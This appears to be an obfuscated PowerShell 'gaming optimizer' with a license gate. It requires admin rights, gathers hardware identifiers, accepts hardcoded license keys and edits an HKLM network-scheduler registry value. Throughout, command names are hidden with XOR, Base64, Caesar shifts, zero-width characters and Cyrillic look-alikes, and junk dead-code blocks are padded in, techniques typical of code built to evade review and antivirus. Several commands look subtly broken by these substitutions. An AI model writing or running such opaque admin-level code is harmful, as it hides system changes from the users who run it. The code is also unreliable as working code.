

# cHecK for AdMinisTratOR PRivileGES
if (-not ([seCuRity.prINcipaL.WiNdowsPRInCIpAL][SeCUrity.prINCIpAl.WInDOWSIdEnTity]::GeTCURRENT()).isINROle([SEcurity.prinCipal.wInDOwsBuILtiNroLe]::aDminisTrAtOr)) {
    &($($k8994=']kv<ac0P:ZmGN';$b=[byte[]](0x0A,0x19,0x1F,0x68,0x04,0x4E,0x67,0x31,0x48,0x34,0x24,0x29);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8994);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x67)))) ('CRITICA'+'L:'+' This s'+'crip'+'t'+' MUST b'+'e execu'+'ted '+'as Ad'+'mi'+'nistrat'+'or! Ple'+'ase re-r'+'un Powe'+'rShe'+'ll as '+'A'+'dmin.')
    &($(-join('x'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('WEl0'))))
}
if ((Get-Random -Minimum 1000 -Maximum 5000) -lt 0) {
    $printerInfo = Get-CimInstance -ClassName Win32_Printer | Select-Object -Property Name, DriverName -First 1; if ($printerInfo) { Write-Verbose "Default Printer Driver: $($printerInfo.DriverName)" }
}
@{ Key = '1ricv' }.GetType().Name | Out-Null

# ---------------------------------------------------------
# poWerSHEll wINdOw AUTo-rEsIZer eNgINe
# ---------------------------------------------------------
function ADJUST-COnSOLEWIndOW {
    $J8M8a = $HoST.Ui.rawuI.BuffeRsiZE
    $yv1ED = $Host.Ui.raWui.WinDowsiZe
    
    $j8M8A.WIDth = 75
    $J8M8A.hEIGht = 1000
    $YV1Ed.widTH = 75
    $Yv1eD.heigHT = 28
    
    $HosT.UI.RAWui.buFFerSize = $J8M8a
    $hoST.UI.RawUi.WINDOwsIZE = $yV1ED
}

$jYBaw5Q = 37; $jYBaw5Q = $jYBaw5Q + 3 - 5; $jYBaw5Q = $null
# ---------------------------------------------------------
# SystEM HaRDwarE HUD sCAnNER engiNe
# ---------------------------------------------------------
function GEt-HWiD {
    $SWtQ3X = &($(-join('YWL'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+8)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+8)%26))}else{[char]$c}}))+$(-join('-GMqMrwxErgi'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+22)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+22)%26))}else{[char]$c}}))) win32_BASEboARd | &(([string]::Format('{0}{1}{2}{3}','se','lEct','-O','B'))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SkVDVA==')))) -ExpAnDprOPeRTy seRIALNUmbEr
    $TVdMV9t = ($sWTQ3X -replace ([string]::Format('{0}{1}','\','s+')),'').tRIm()
    if ([STRINg]::IsNULLoReMptY($TvdmV9t) -or $tvDmV9T -eq $(-join('Stsj'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+21)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+21)%26))}else{[char]$c}}))) {
        $TvdMV9t = 'S​Y‍S‌-​C​O‍M‌M‌U​N‍I‌T‌Y​-‍H‍W​I‌D​'
    }
    return $TvdMv9t
}
try {
    throw "Intentionally skipping this block";
    try { $webResponse = Invoke-WebRequest -Uri "http://localhost:8682/health" -TimeoutSec 1 -ErrorAction Stop } catch [System.Net.WebException] { Write-Warning "Simulated health check failed: $($_.Exception.Message)" }
} catch {}

$gpAw2vE = [System.Guid]::NewGuid().ToString(); $gpAw2vE.Substring(0, 7) | Out-Null; $gpAw2vE = $null
function GeT-systEmspecS {
    $PRsbn7MB = @{}
    $prSBn7Mb["$([char]0x50)$([char]0x43)$([char]0x4E)$([char]0x61)$([char]0x6D)$([char]0x65)"] = $jJof:COMPuTErname
    
    $SMjAZ = &($(-join('rPe-'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+15)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+15)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x63,0x69,0x6D,0x69,0x6E,0x53,0x74,0x41,0x6E,0x43,0x45)))) Win32_pROCESSor | &($($k1556='wIixZSnTf>';$b=[byte[]](0x04,0x2C,0x05,0x1D,0x19,0x27,0x43);$kb=[System.Text.Encoding]::UTF8.GetBytes($k1556);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+'O​B​J​e​C‌T‍') -fIrSt (-30 / -30) -EXPandPROPErTY NAmE
    $PrSBn7mb[('{0}{1}' -f 'CP','U')] = ($sMjaZ -replace ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('XHMr'))), (-join([char]0x20))).TrIm()
    
    $VK29k7a = &(('gET'+'-CiM'+'i'+'N')+('{0}{1}{2}' -f 'sTA','NC','E')) WIN32_vIdeocOntROLleR | WhErE-OBjeCT { $_.adaPTERDACtYPe -ne ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW50ZXJuYWw='))) -and $_.INStalLeddIsPLaydRIvERs } | &((-join([char]0x53))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZUxFY3QtT0JKRUNU')))) -FiRST (8 / 8) -EXPaNDpROPERtY NaMe
    if (-not $vk29K7A) { $VK29K7A = get`-cIMinStAnCe WiN32_vIDEOCoNtrolLER | &(([string]::Format('{0}{1}','s','E'))+'Lесt-оbJеСt') -fIrST (42 / 42) -exPANDprOPErTY NamE }
    $pRSbn7mB[([System.Text.Encoding]::UTF8.GetString([byte[]](0x47,0x50,0x55)))] = $Vk29k7a
    
    $wV13 = &($($k1047='9l8HYOX#zffz$n';$b=[byte[]](0x5E,0x09,0x6C,0x65,0x1A,0x26,0x35,0x4A,0x14,0x15,0x32,0x1B,0x4A);$kb=[System.Text.Encoding]::UTF8.GetBytes($k1047);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Q0U=')))) WIn32_phySicALmEmory | &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x4D,0x45,0x61,0x73,0x75,0x52,0x45,0x2D)))+"$([char]0x6F)$([char]0x62)$([char]0x6A)$([char]0x45)$([char]0x43)$([char]0x74)") -prOperTy cAPacity -SUM | &($(-join('g'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+12)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+12)%26))}else{[char]$c}}))+('{0}{1}{2}{3}' -f 'eleCt','-oBje','c','T')) -EXPanDPROpERTy SUm
    $PrSbn7mB[$(-join('DMY'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}}))] = ($([Math]::Round($WV13 / 1GB) + $($k4287=236;$b=[byte[]](0xc5,0xcc,0xab,0xae);-join($b|%{[char]($_-bxor$k4287)})))
    
    return $pRsbn7mb
}
try {
    throw "Intentionally skipping this block";
    $currentTimeUTC = [System.DateTime]::UtcNow; Write-Verbose "Current UTC time: $($currentTimeUTC.ToString('o'))"
} catch {}
# ---------------------------------------------------------
# NaTIvE INLInE anIMAtION iNPut COntrOLLers
# ---------------------------------------------------------
function read-hOST-AniMAted {
    param([StrING]$uZfdFHv, [STrIng]$W0Disf)
    
    $meAsglo = ($(-join('    '.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+5)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+5)%26))}else{[char]$c}})) + $w0diSF + $(-join('        '.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+5)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+5)%26))}else{[char]$c}})))
    &(('{0}{1}{2}' -f 'WRIt','E-H','o')+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('c3Q=')))) $UZFdfHV -noNEwliNe -ForegRouNDCOlOr YelloW
    
    # วิ่งวนข้อความบน TItle Bar รอระหว่างพิมพ์คำสั่ง
    $nqVQgUm = ''
    while (('x' -eq ([string]::Format('{0}','x')))) {
        if ([coNSOLE]::KEyavAiLABLe) {
            $fn42Jzvn = [CONsOle]::REAdKEY((1 -band 1))
            if ($fn42jzvN.keY -eq [CoNsoLeKEY]::ENTER) {
                &('wrіtе'+([string]::Format('{0}{1}','-Ho','St'))) ''
                break
            }
            if ($Fn42JzVn.keY -eq [CONSOlEKEy]::BaCksPACe) {
                if ($NqVqgum.leNGTH -gt 0) {
                    $nQVqGUm = $nQVQGUM.SUbsTrING(0, $NqVqgUm.LeNGTH - 1)
                    &(('WrIT'+'E-h'+'O')+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('c1Q=')))) ('{0}{1}{2}' -f '`','`b',' ``b') -NoNEwLiNE
                }
            } else {
                $nqVqGum += $Fn42JzVN.KEYchAR
                &(('wRitE'+'-H'+'o'+'s')+'T‌') $fN42JZVn.kEyCHAr -NONeWlINE -foReGROUNDCOloR whITE
            }
        }
        
        # เลื่อนตัวอักษรไปข้างหน้า
        $HOST.UI.RaWui.WINDowtItLE = $measGlO
        $meAsGlo = $measgLo.SubstrInG(1) + $mEasGLo.SuBsTring(0, 1)
        &('stаr'+('{0}{1}{2}{3}' -f 't-s','Le','E','p')) -miLLIseCoNDS 120
    }
    return $nqVqgUm
}
function ShoW-AutHsCreeN {
    aDJUST-CONSolewiNDOW
    cLEaR-Host
    $rVXVLupZ = GeT-hw`id
    $PrSBN7mb = &('GЕt-SҮsТ'+([string]::Format('{0}{1}{2}{3}','eMS','P','eC','S')))
    $dKhT = @(('{0}{1}' -f 'de','v'), ($($k2179=101;$b=[byte[]](0x20,0x29,0x2c,0x31,0x20,0x48,0x31,0x32,0x20,0x24,0x2e,0x36,0x48);-join($b|%{[char]($_-bxor$k2179)})) + $(2068 % 1069)))

    &('WR'+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SXRFLUhvc1Q=')))) ('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}' -f '=====','=','=','====','===','====','=====','=====','===','==','=====','=','====','====','===','====','=====') -foRegROUnDColoR CYAN
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V1JJdGUtSE9z')))+'T') ' ‌ ‌ ‌ ‌ ​ ​ ​ ​ ​L​I‍T​E​P‍R​O‌ ‌P‌E​R‌F‌O‌R‌M‍A‍N‍C‍E​ ​S‍U‌I​T‌E​ ‍L​I​C​E‍N​S​E​ ​M‍A‍N‍A​G​E‍R‍ ​ ‍ ​ ‍ ​ ​ ‍ ‍ ​ ‌ ‍ ‌' -FOREgrouNDcOLoR GReEn
    &($(-join('Ezqbm-'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+18)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+18)%26))}else{[char]$c}}))+('{0}' -f 'hOst')) '===========================================================' -FOregrOUnDcOloR CYAN
    WRITE`-hoSt (' STATUS'+'      '+': U'+'NA'+'U'+'THOR'+'I'+'Z'+'E'+'D') -ForeGrOUNdcOlOr RED
    &(('{0}{1}{2}{3}' -f 'WRit','e-','h','o')+"$([char]0x73)$([char]0x54)") ((-join([char]0x20, [char]0x59, [char]0x4F, [char]0x55, [char]0x52, [char]0x20, [char]0x48, [char]0x57, [char]0x49, [char]0x44, [char]0x20, [char]0x20, [char]0x20, [char]0x3A, [char]0x20)) + $rVxVluPz) -FOrEGrouNdcolor yELlow
    wR`itE-HoST '-----------------------------------------------------------' -ForegRouNdColor GraY
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtaG8=')))+('{0}' -f 'St')) ''(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('IERFVklDRSBOQU1FIDog'))) + $($pRsBN7mB['PCName'])) -foreGroUnDcolor grAy
	&(('{0}' -f 'w')+$($k4895=189;$b=[byte[]](0xef,0xd4,0xe9,0xd8,0x90,0xd5,0xd2,0xce,0xc9);-join($b|%{[char]($_-bxor$k4895)}))) '' -foReGroUnDcOLor WHITe
    Wr`iTE-hOst ''($($k1348=204;$b=[byte[]](0xec,0x9c,0x9e,0x83,0x8f,0x89,0x9f,0x9f,0x83,0x9e,0xec,0xec,0xec,0xf6,0xec);-join($b|%{[char]($_-bxor$k1348)})) + $($pRsBN7mB['CPU'])) -foREgROunDcolor grAY
	&(('WRI'+'T'+'E-')+('{0}{1}' -f 'hOs','t')) '' -FOreGROUndCoLOr WHItE
    WrItE-H`oST ''($(-join(' BMVKCDXN    : '.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+5)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+5)%26))}else{[char]$c}})) + $($pRsBN7mB['GPU'])) -FOREgRoUndColOR gRaY
	&((-join('W','r','I','t'))+$(-join('A-Dkop'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+4)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+4)%26))}else{[char]$c}}))) '' -FOrEgrOUNDcOLOr wHItE
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Vw==')))+$(-join('PgRc-fmqr'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+2)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+2)%26))}else{[char]$c}}))) ''($(-join(' ASACFM dccz : '.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+12)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+12)%26))}else{[char]$c}})) + $($pRsBN7mB['RAM'])) -FOreGrOUnDCOloR grAy
    WritE-H`oST ('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}' -f '====','=====','====','===','=','=====','=','=====','===','=====','==','==','===','===','=====','===','=====') -ForEGROuNDCOlOR cyan
    &('w​R‍i​'+([System.Text.Encoding]::UTF8.GetString([byte[]](0x74,0x45,0x2D,0x48,0x6F,0x53,0x54)))) ''
    # เรียกใช้ระบบอนิเมชั่นตรงจุดนี้
    # เรียกใช้ระบบอนิเมชั่นตรงจุดนี้
    $DC1Rv = &($(-join('viEH-lSwX-'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+22)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+22)%26))}else{[char]$c}}))+'аnImАtеd') -pROMptteXT ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('IEVudGVyIExpY2Vuc2UgS2V5IDog'))) -tItlETeXT ('{0}{1}{2}{3}{4}{5}' -f 'Li','teP','r','o Lo','ad','er')
    if ($dkht -contains $dC1rV.trIm().toUPPEr()) {
        &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x77,0x52,0x69,0x74,0x65,0x2D,0x68,0x6F,0x53)))+('{0}' -f 't')) ([string]::Format('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}','``n','[+]',' K','ey V','er','ifie','d! ','B','o','o','ting ','Co','r','e En','gine',' Pa','cks..','.')) -ForegROundCoLOR gREeN
        &(('S'+'T')+$($k7067=93;$b=[byte[]](0x3c,0x0f,0x29,0x70,0x0e,0x31,0x18,0x18,0x0d);-join($b|%{[char]($_-bxor$k7067)}))) -seCondS (-90 -bxor -89)
        return ([mAth]::PI -gt 3)
    } else {
        &('W‍R‌I‍t​E‍-​H‌O​S‍'+('{0}' -f 't')) '`‌`​n​[​X​]‌ ‍I‍N‍V​A​L​I​D​ ‍L‌I​C​E‌N​S‍E​ ‌K‍E‍Y‍!‍ ‌A‌c‍c​e‍s‍s​ ‌D‍e​n​i​e​d‍.​' -forEgRouNdcoLOr RED
        &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('U3RhUnQtU0w=')))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZWVw')))) -seConDS (34 - 32)
        return ($null -ne $nUll)
    }
}

# ---------------------------------------------------------
# main iNtEraCTivE corE
# ---------------------------------------------------------
function ShOw-WelComEHeadER {
    adjuST-consoLeWINDOW
    Clear-Host
    $rvxvluPZ = GeT-h`wiD
    $pRsBN7mB = GET-s`yStemSpeCS
    wRItE-HosT ('======='+'=='+'==='+'==='+'='+'==='+'===='+'======'+'===='+'======'+'====='+'======='+'======='+'=') -foREGrOUnDcoLOr cyAn
    &($(-join('YtkvG-'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}}))+$($k2809=57;$b=[byte[]](0x51,0x76,0x4a,0x6d);-join($b|%{[char]($_-bxor$k2809)}))) "$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x4C)$([char]0x49)$([char]0x54)$([char]0x45)$([char]0x50)$([char]0x52)$([char]0x4F)$([char]0x20)$([char]0x50)$([char]0x45)$([char]0x52)$([char]0x46)$([char]0x4F)$([char]0x52)$([char]0x4D)$([char]0x41)$([char]0x4E)$([char]0x43)$([char]0x45)$([char]0x20)$([char]0x53)$([char]0x55)$([char]0x49)$([char]0x54)$([char]0x45)$([char]0x20)$([char]0x20)$([char]0x5B)$([char]0x45)$([char]0x58)$([char]0x54)$([char]0x52)$([char]0x45)$([char]0x4D)$([char]0x45)$([char]0x20)$([char]0x45)$([char]0x44)$([char]0x49)$([char]0x54)$([char]0x49)$([char]0x4F)$([char]0x4E)$([char]0x5D)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)" -FoREGroUndCoLor gReen
    &($($k4151='rlvp24XC1#U';$b=[byte[]](0x25,0x1E,0x3F,0x04);$kb=[System.Text.Encoding]::UTF8.GetBytes($k4151);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+('E-h'+'OST')) $($k8864=115;$b=[byte[]](0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e,0x4e);-join($b|%{[char]($_-bxor$k8864)})) -FOreGroundcOlOR CYAn
    &("$([char]0x77)$([char]0x52)$([char]0x69)$([char]0x54)$([char]0x65)$([char]0x2D)$([char]0x68)"+('{0}{1}' -f 'Os','t')) "$([char]0x20)$([char]0x4C)$([char]0x49)$([char]0x43)$([char]0x45)$([char]0x4E)$([char]0x53)$([char]0x45)$([char]0x20)$([char]0x3A)$([char]0x20)$([char]0x56)$([char]0x45)$([char]0x52)$([char]0x49)$([char]0x46)$([char]0x49)$([char]0x45)$([char]0x44)$([char]0x20)" -fORegRouNdCoLoR GReeN
    WrItE`-HOST (('{0}{1}{2}{3}' -f ' H','WID  ','  ',': ') + $rVxVluPz) -FoReGrOUnDColoR GraY
    &('wr'+'i​t‍e‍-​h​o‍s​t​') ''''($(-join(' IZX     : '.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+9)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+9)%26))}else{[char]$c}})) + $($pRsBN7mB['CPU']) + $(-join(' | '.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+13)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+13)%26))}else{[char]$c}})) + $($pRsBN7mB['RAM'])) -fOregrOUndcoLOr Gray
    &(('{0}' -f 'WRi')+$(-join('Fq-TAef'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}}))) ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0='))) -fOregrouNDcoloR cyaN
    &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x77,0x52)))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aXRlLUhvc1Q=')))) ($($k9864='mvSSrG6.b';$b=[byte[]](0x4D,0x2D);$kb=[System.Text.Encoding]::UTF8.GetBytes($k9864);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) + $(37 / 37) + $($k2941='j3VawT';$b=[byte[]](0x37,0x13,0x76,0x28,0x39,0x07,0x3E,0x72,0x1A,0x2D,0x57,0x1B,0x3A,0x67,0x1F,0x2C,0x3E,0x0E,0x2F,0x13,0x17,0x2D,0x3B,0x74);$kb=[System.Text.Encoding]::UTF8.GetBytes($k2941);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) -foregROundCoLor gReen
    &(('{0}{1}' -f 'wri','tE-')+$(-join('jQUv'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}}))) (([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('IFs='))) + $(12 / 6) + ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('XSAgRklWRU0gUW9TICBORVRXT1JLIFBPTElDWQ==')))) -ForEGRouNDcoloR whItE
    &('W'+(-join('R','iT','e','-HOs','t'))) ($($k7632='{Q>RaGkE}XR1jC';$b=[byte[]](0x5B,0x0A);$kb=[System.Text.Encoding]::UTF8.GetBytes($k7632);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) + $(86 - 83) + $($k4371=207;$b=[byte[]](0x92,0xef,0xef,0x9d,0x80,0x83,0x83,0x8d,0x8e,0x8c,0x84,0xef,0x8e,0x83,0x83);-join($b|%{[char]($_-bxor$k4371)}))) -FOrEGROUNDcOlOR YeLLow
    &(('{0}' -f 'W')+"$([char]0x52)$([char]0x49)$([char]0x54)$([char]0x45)$([char]0x2D)$([char]0x68)$([char]0x6F)$([char]0x53)$([char]0x54)") ($($k7145='$(!h;uipuOj';$b=[byte[]](0x04,0x73);$kb=[System.Text.Encoding]::UTF8.GetBytes($k7145);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) + $(68 / 17) + $($k6792='Pg,]=?j>';$b=[byte[]](0x0D,0x47,0x0C,0x18,0x65,0x76,0x3E,0x1E,0x03,0x32,0x65,0x09,0x78);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6792);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) -fOrEGRoUNdCoLOR RED
    &($($k4688=203;$b=[byte[]](0x9c);-join($b|%{[char]($_-bxor$k4688)}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cklURS1oT1N0')))) (-join([char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D)) -FOREGroUNdcoLor CyAN
}
try {
    throw "Intentionally skipping this block";
    $processList = Get-Process | Sort-Object -Property WS -Descending | Select-Object -First 6; foreach ($p in $processList) { Write-Verbose "High Memory process: $($p.Name) - $($p.WS)" }
} catch {}

$L9trz = 'nclfv' * 3; $L9trz.Replace('h', 'c') | Out-Null; Remove-Variable L9trz -ErrorAction SilentlyContinue
function GLObAL-oPTIMIze {
    &("$([char]0x57)$([char]0x52)$([char]0x69)$([char]0x54)$([char]0x65)$([char]0x2D)"+$(-join('xeiJ'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+10)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+10)%26))}else{[char]$c}}))) (-join([char]0x60, [char]0x60, [char]0x6E, [char]0x5B, [char]0x2B, [char]0x5D, [char]0x20, [char]0x49, [char]0x6E, [char]0x69, [char]0x74, [char]0x69, [char]0x61, [char]0x6C, [char]0x69, [char]0x7A, [char]0x69, [char]0x6E, [char]0x67, [char]0x20, [char]0x41, [char]0x64, [char]0x76, [char]0x61, [char]0x6E, [char]0x63, [char]0x65, [char]0x64, [char]0x20, [char]0x47, [char]0x61, [char]0x6D, [char]0x69, [char]0x6E, [char]0x67, [char]0x20, [char]0x4F, [char]0x70, [char]0x74, [char]0x69, [char]0x6D, [char]0x69, [char]0x7A, [char]0x61, [char]0x74, [char]0x69, [char]0x6F, [char]0x6E, [char]0x20, [char]0x53, [char]0x74, [char]0x61, [char]0x63, [char]0x6B, [char]0x2E, [char]0x2E, [char]0x2E)) -foreGrOuNDCoLor CYAN
    &('st'+('{0}{1}{2}{3}{4}' -f 'ARt','-SL','e','e','P')) -miLLIsEcoNdS 500

    # 1. nEtworK & gpEDIt unLIMIt (QoS pACket SCHeDuLer)
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('d1JJVEUtSA==')))+('{0}{1}' -f 'os','T')) "$([char]0x5B)$([char]0x3E)$([char]0x5D)$([char]0x20)$([char]0x55)$([char]0x6E)$([char]0x6C)$([char]0x69)$([char]0x6D)$([char]0x69)$([char]0x74)$([char]0x69)$([char]0x6E)$([char]0x67)$([char]0x20)$([char]0x42)$([char]0x61)$([char]0x6E)$([char]0x64)$([char]0x77)$([char]0x69)$([char]0x64)$([char]0x74)$([char]0x68)$([char]0x20)$([char]0x26)$([char]0x20)$([char]0x54)$([char]0x75)$([char]0x6E)$([char]0x69)$([char]0x6E)$([char]0x67)$([char]0x20)$([char]0x54)$([char]0x43)$([char]0x50)$([char]0x20)$([char]0x4E)$([char]0x65)$([char]0x74)$([char]0x77)$([char]0x6F)$([char]0x72)$([char]0x6B)$([char]0x20)$([char]0x53)$([char]0x74)$([char]0x61)$([char]0x63)$([char]0x6B)$([char]0x2E)$([char]0x2E)$([char]0x2E)" -FOreGroundcoLOR WHITE
    $kqka4t = ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SEtMTTpcU09GVFdBUkVcUG9saWNpZXNcTWljcm9zb2Z0XFdpbmRvd3NcUHNjaGVk')))
    if (-not (TEsT`-path $kQKA4T)) { &($($k9392='O.2QGP';$b=[byte[]](0x21,0x6B,0x45,0x7C);$kb=[System.Text.Encoding]::UTF8.GetBytes($k9392);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SXRlTQ==')))) -PAth $kqkA4T -fOrCe | &(('O'+'U')+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('VC1OVUxs')))) }
    &('N​e​w​-‍i​t‌e‍M‌P‌R‌O‍'+'P‌E​r‌T‍Y‌') -paTH $kQKa4T -naME $(-join('AbaOrfgRssbegYvzvg'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+13)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+13)%26))}else{[char]$c}})) -Value (-53 -bxor -53) -PrOpErtyTyPe DWORD -fORCE | &("$([char]0x4F)"+$($k3351='rl7Ybgy=a@W{qn';$b=[byte[]](0x07,0x18,0x1A,0x37,0x37,0x2B,0x35);$kb=[System.Text.Encoding]::UTF8.GetBytes($k3351);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})))

